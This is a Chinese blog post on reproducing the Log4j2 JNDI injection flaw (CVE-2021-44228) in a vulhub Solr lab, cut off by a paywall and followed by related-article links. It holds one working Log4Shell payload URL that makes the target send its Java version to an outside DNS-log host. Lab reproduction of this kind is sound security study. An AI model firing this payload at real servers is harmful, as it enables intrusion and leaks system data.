复现log4j2-CVE-2021-44228

VIP文章 已于 2022-05-17 20:31:38 修改
阅读量423 收藏
点赞数
分类专栏: Web安全专栏 文章标签: 安全
于 2022-05-17 20:28:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SharkVeryBusy/article/details/124829098
版权

漏洞原理:

官方表述是:Apache Log4j2 中存在JNDI注入漏洞,当程序将用户输入的数据进行日志记录时,即可触发此漏洞,成功利用此漏洞可以在目标服务器上执行任意代码。

通俗简单的说就是:在打印日志的时候,如果你的日志内容中包含关键词 ${,攻击者就能将关键字所包含的内容当作变量来替换成任何攻击命令,并且执行。

vulhub环境搭建

运行log4j容器

访问

 payload:

http://192.168.8.139:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.xyr4kk.dnslog.cn}

dnslog上刷新显示jdk版本

漏洞分析:

pom依赖:
    <!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-core -->
    <dependencies>
        <dependency>
最低0.47元/天 解锁文章
「已注销」
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[渗透测试笔记] 50.Log4j2漏洞复现(CVE-2021-44228)
H4ppyD0g的博客
03-17 2892
文章目录漏洞描述利用工具简单复现vulhub复现手动复现深入分析漏洞原理 漏洞描述 漏洞描述 Apache Log4j是Apache的一个开源项目,是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。该日志框架被大量用于业务系统开发,用来记录日志信息。 Log4j2中存在JNDI注入漏洞,当程序将用户输入的数据被日志记录时,即可触发此漏洞,成功利用此
Log4j-2.15.0-rc2.zip
12-10
Apache Log4j2 远程代码执行漏洞(CVE-2021-44228) 包含log4j-slf4j-impl-2.15.0.jar、log4j-1.2-api-2.15.0.jar、log4j-core-2.15.0.jar、log4j-web-2.15.0.jar、log4j-api-2.15.0.jar
CVE-2021-44228log4j2漏洞复现
fainpo的博客
05-07 265
漏洞适用版本:2.0 <= Apache log4j2 <= 2.14.1。
log4j2漏洞复现 (CVE-2021-44228)
m0_59958467的博客
10-29 886
log4j2漏洞复现 (CVE-2021-44228)
log4j2远程代码执行漏洞复现CVE-2021-44228
Wshchf的博客
06-04 581
Apache log4j2—RCE 漏洞是由于Log4j2 提供的lookup功能下的jndi Lookup模块出现问题所导致的,该功能模块在输出日志信息时允许开发人员通过相应的协议去请求远程主机上的资源。而开发人员在处理数据时,并没有对用户输入的数据进行判断,导致Log4j2 请求远程主机上含有恶意代码的资源并执行其中的代码,从而造成远程代码执行漏洞。log4j2框架下的lookup查询服务提供了{}字段解析功能,传进去的值会被直接解析。例如${java:version}会被替换为对应的java版本。
Solr 使用 Log4j
08-30 214
原文出处:http://blog.chenlb.com/2010/08/solr-with-log4j.html Solr 默认是用 Jdk 的日志输出。还好 Solr 是使用 slf4j 日志库,可以方便换用其它日志输出。solr 使用 log4j 也不难。重新生成 solr.war 把 solr.war 解压,然后把 log4j.properties 放到 W...
apache-log4j-2.17.0 核心jar包
03-31
Log4j 是一个日志记录框架,Log4j 2 是对 Log4j 的升级,提供了重大改进,超越其前身 Log4j 1.x,并提供...Log4j 团队已获悉一个安全漏洞 CVE-2021-45105,该漏洞已在 Java 8 及更高版本的 Log4j 2.17.0 中得到解决。
laravel-CVE-2021-3129-EXP-main.zip 写shellexp
12-17
CVE-2021-3129-EXP 自动写shell的exp
Solr 支持log4j
weixin_33772645的博客
12-18 151
2019独角兽企业重金招聘Python工程师标准>>> ...
solr 添加 log4j
gezehao的专栏
01-15 748
公司使用solr进行搜索功能 ,需要用LOG4J向指定的server打ERROR级别log用来监控。 但是solr不是web业务工程   只能使用自带的log4j.properties去配置指定的logger格式等参数 所以只能去使用指定的命令行去指定例如   java -jar start.jar -Dlog4j.configuration=file:./resources
Solr4.4 自行配置log4j内容
艾欧里亚
08-06 196
          我们solr.war 装载后 在 webapps/下生成 solr的文件夹。           然后把 log4j.properties 放到 WEB-INF/classes 中。没有 classes 创建一个。                 备注:solr的LOG4J 文件在 \solr-4.4.0\example\resources 目录下  log4j.pr...
Solr Shiro Log4j2 命令执行--文件读取--反序列化--身份权限绕过--命令执行
最新发布
weixin_74985952的博客
10-10 175
Apache Velocity是一个基于Java的模板引擎,它提供了一个模板语言去引用由Java代码定义的对象。Velocity是Apache基金会旗下的一个开源软件项目,旨在确保Web应用程序在表示层和业务逻辑层之间的隔离(即MVC设计模式)。Apache Solr 5.0.0版本至8.3.1版本中存在输入验证错误漏洞。攻击者可借助自定义的Velocity模板功能,利用Velocity-SSTI漏洞在Solr系统上执行任意代码。
solr7.4-log4j、中文分词
weixin_38289303的博客
11-29 153
> log4j错误 FileNotFoundException: 修改启动文件: solr-7.4.0\bin\solr.cmd: "file:"替换为"file:///" > 配置中文解析器: 1. 下载添加依赖包至:solr-7.4.0\server\solr-webapp\webapp\WEB-INF\lib下。 2. 创建并存放相关配置文件至: solr-7.4.0...
solr笔记
05-23 283
document、fieldType、field、analyzer、tokenizer、filter solrj SolrServer solrServer = new HttpSolrServer("http://localhost:8080/solr/dbSearch"); ClientUtils.escapeQueryChars(keyWord); SolrQuery par
Solr logging 配置
Austin.Zhou的专栏
11-10 1792
Tomcat by default uses a customized version of java logging api. The configuration is located at ${tomcat_home}/conf/logging.properties. It follows the standard java logging configuration syntax plus
apache log4j CVE-2021-44228漏洞怎么解决
06-03
java -Dlog4j2.formatMsgNoLookups=true -Dlog4j2.disable.jmx=true -Dlog4j2.benchMillis=100 org.apache.logging.log4j.core.tools.GenerateExtendedLoggerInfo > log4j2-enum-class-loader.policy ``` 然后将...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值